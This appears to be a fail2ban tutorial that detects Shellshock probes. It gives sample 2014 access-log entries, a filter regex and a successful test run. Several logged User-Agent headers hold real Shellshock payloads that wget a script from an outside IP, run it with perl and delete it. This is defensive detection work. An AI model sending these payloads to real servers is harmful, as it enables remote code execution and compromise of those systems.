9 sample access-log entries saved in /var/log/test.log:
89.207.135.125 - - [25/Sep/2014:04:14:19 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:17:42:32 -0400] "GET / HTTP/1.1" 200 288 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php.fcgi HTTP/1.0" 404 401 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/info.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php HTTP/1.0" 500 738 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /test HTTP/1.0" 404 389 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php5 HTTP/1.0" 500 738 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
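# Fail2ban filter for Shellshock-style probes in a web server access log
# (installed as /etc/fail2ban/filter.d/shellshock.conf).
# It matches a bash function-definition prefix "() { ... };" followed by a
# trailing command, whether it appears in the request line or in a quoted
# header field such as Referer or User-Agent.
[Definition]
# Not referenced by failregex below.
docroot = /var/www/html
# The key name must appear only once: a second "failregex =" on the line would
# become part of the pattern and no log line would match.
# <HOST> is anchored to the start of the line so that only the logged client
# address can be captured; everything after it is attacker-controlled text.
failregex = ^<HOST> .*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+
ignoreregex =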
Testing:
# Offline check: run the filter's failregex against the sample log and report
# which lines and hosts match. fail2ban-regex only prints results.
fail2ban-regex /var/log/test.log /etc/fail2ban/filter.d/shellshock.conf
Summary
=======
Addresses found:
[1]
89.207.135.125 (Thu Sep 25 04:14:19 2014)
198.20.69.74 (Thu Sep 25 17:42:32 2014)
74.201.85.66 (Thu Sep 25 23:43:24 2014)
74.201.85.66 (Thu Sep 25 23:43:24 2014)
74.201.85.66 (Thu Sep 25 23:43:24 2014)
74.201.85.66 (Thu Sep 25 23:43:24 2014)
74.201.85.66 (Thu Sep 25 23:43:24 2014)
74.201.85.66 (Thu Sep 25 23:43:24 2014)
74.201.85.66 (Thu Sep 25 23:43:24 2014)
Date template hits:
18 hit(s): Day/MONTH/Year:Hour:Minute:Second
Success, the total number of match is 9
Enjoy the Goodness!